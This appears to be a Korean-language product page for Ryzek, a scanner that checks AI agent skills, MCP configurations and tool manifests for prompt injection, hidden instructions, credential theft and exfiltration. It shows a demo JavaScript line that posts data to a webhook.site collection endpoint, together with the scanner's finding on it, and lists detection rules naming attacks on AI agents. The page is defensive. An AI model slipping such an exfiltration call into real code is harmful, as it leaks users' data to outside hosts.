AI 에이전트를 위한 보안 스캐닝
에이전트가 실행하기 전에, 그 스킬이 무엇을 하는지 알아보세요.
Ryzek는 스킬, MCP 서버 설정, 도구 매니페스트를 읽고 프롬프트 인젝션, 숨겨진 지시, 자격 증명 탈취, 과도한 권한, 승인 후 바뀐 도구를 표시합니다. 모든 탐지 결과에는 신뢰도 점수와 그 이유가 함께 제공됩니다.
무료 요금제: 모든 규칙이 포함된 월 20회 스캔. 스캔한 파일은 메모리에서 읽힌 뒤 저장되지 않습니다.
const ENDPOINT = "https://webhook.site/0000-demo"; await fetch(ENDPOINT, { method: "POST", body: JSON.stringify(notes),});
Ryzek가 문제 1건을 발견했습니다
Contains a hardcoded request-collection endpoint. These services exist to capture arbitrary inbound requests and are not used by production software.
webhook.site
이 페이지가 빌드될 때 생성된 실제 스캐너 출력입니다.
트레일러
80초로 보는 Ryzek.
에이전트에게 조용히 넘겨지고 있는 것들 — 그리고 실행되기 전에 Ryzek가 보여주는 것들.
작동 방식
업로드부터 실행 가능한 판정까지.
설치할 필요가 없습니다. 로그인하고 파일을 추가한 뒤 Ryzek가 발견한 내용과 이유를 확인하세요.
-
01 · 로그인
무료 계정 만들기
이미 가지고 있는 계정으로 로그인하세요. 스캔 한도와 도구 기록이 모든 기기로 함께 따라옵니다.
-
02 · 파일 추가
에이전트가 불러오는 것을 끌어다 놓으세요
스크립트가 포함된 스킬 폴더, MCP 설정, 도구 매니페스트,
package.json또는requirements.txt. -
03 · 결과 확인
단순한 표시가 아닌 이유를 확인하세요
각 탐지 결과는 심각도, Ryzek의 확신 정도, 그 이유, 원인이 된 정확한 텍스트, OWASP 카테고리를 보여줍니다.
-
04 · 재스캔
도구가 바뀌었을 때 바로 알기
Ryzek는 파일이 아니라 각 도구의 지문을 보관하므로, 이후 스캔에서 승인했던 무언가가 바뀌었는지 알려드릴 수 있습니다.
탐지하는 것
다섯 가지 위험 유형에 걸친 54개의 규칙.
모든 규칙은 규칙 페이지에서 라이브 데모를 제공합니다: 파일, 핵심이 되는 부분, 스캐너가 실제로 보고하는 내용.
18개 규칙 · 에이전트 안전
AI를 겨냥한 텍스트
프롬프트 인젝션, 주석이나 보이지 않는 문자에 숨겨진 지시, 위조된 도구 결과, 메모리 오염.
5개 규칙 · 유출
데이터가 빠져나가는 경로
수집 엔드포인트, DNS 터널링, 이미지 비콘, 비공개 읽기와 공개 쓰기를 짝짓는 도구.
7개 규칙 · 자격 증명
잘못된 위치에 있는 시크릿
하드코딩된 키, MCP 설정 안의 토큰, 자격 증명 저장소와 셸 기록 읽기, 클라우드 메타데이터 요청.
13개 규칙 · 공급망
코드의 출처
고정되지 않았거나 위장된 서버, 알려진 취약 버전, 설치 훅, 섀도우 서버, 승인 이후 바뀐 도구.
11개 규칙 · 실행
작업에 필요한 것보다 더 큰 권한
과도한 권한, 자동 승인된 도구, 샌드박스 탈출, 지속성, 명령 인젝션.
모든 규칙
모든 데모 보기 →
위험도로 필터링하고, 쉬운 설명을 읽고, 각 규칙의 실제 결과를 확인하세요.
Ryzek를 선택하는 이유
확인할 수 있는 탐지 결과, 어디서 멈추는지 밝히는 스캐너에서.
거짓 경보를 남발하는 스캐너는 무시당하고, 과장하는 스캐너는 신뢰해서는 안 될 때 신뢰받습니다. Ryzek는 둘 다 피하도록 만들어졌습니다.
Ryzek가 볼 수 없는 것을 확인하세요 — 서버가 실행 중일 때만 나타나는 동작과 컴파일된 프로그램 내부를 포함해서요.
- 모든 탐지 결과에 명시된 이유. 규칙이 얼마나 확신하는지, 그리고 왜 그런지 — 낮은 신뢰도의 힌트가 확인된 공격처럼 읽히지 않도록 합니다.
- 변경 감지. 승인 이후 조용히 바뀐 도구는 다음 스캔에서 표시됩니다.
- 파일은 보관되지 않습니다. 업로드된 파일은 메모리에서 스캔된 뒤 폐기됩니다. 저장하는 것은 스캔 횟수와 도구 지문뿐, 내용은 절대 저장하지 않습니다.
- OWASP에 매핑. 모든 규칙은 OWASP MCP Top 10의 카테고리에 매핑됩니다.
- 모든 요금제에서 모든 규칙을. 유료 요금제는 탐지 기능이 아니라 사용량과 자동화를 더합니다.
질문
자주 묻는 질문.
스캔한 파일을 보관하나요?
아니요. 파일은 HTTPS로 스캐너에 전송되어 메모리에서 스캔되고, 결과가 나오면 폐기됩니다. 저희가 저장하는 것은 사용하신 스캔 횟수와 각 도구의 지문(해시와 권한 레이블)뿐이며, 이를 통해 도구가 바뀌었는지 알려드립니다. 자세한 내용은 개인정보 처리방침을 참고하세요.
계정이 왜 필요한가요?
그래서 스캔 한도와 도구 기록이 어디서든 함께 따라옵니다. 변경 감지는 Ryzek가 마지막으로 스캔했을 때 도구가 어떤 모습이었는지 기억해야만 작동합니다.
어떤 파일을 스캔할 수 있나요?
스킬 폴더(SKILL.md와 그 옆의 스크립트), .mcp.json나 claude_desktop_config.json 같은 MCP 설정 파일, JSON 도구 매니페스트, 그리고 설치 훅과 취약한 의존성을 위한 package.json 또는 requirements.txt.
클린 결과는 스킬이 안전하다는 뜻인가요?
아니요 — 54개 규칙 중 일치하는 것이 없었다는 뜻일 뿐입니다. Ryzek는 파일을 읽지 실행하지 않으므로, 실행 시점에만 나타나는 동작이나 컴파일된 프로그램 내부는 볼 수 없는 영역입니다. 클린 스캔 결과는 좋은 신호이지 보증이 아닙니다.
CI에서 실행할 수 있나요?
아직은 아닙니다. CI 연동은 유료 요금제에 계획되어 있습니다. 중요하다고 생각하시면 알려주세요 — 무엇을 먼저 만들지 결정하는 데 도움이 됩니다.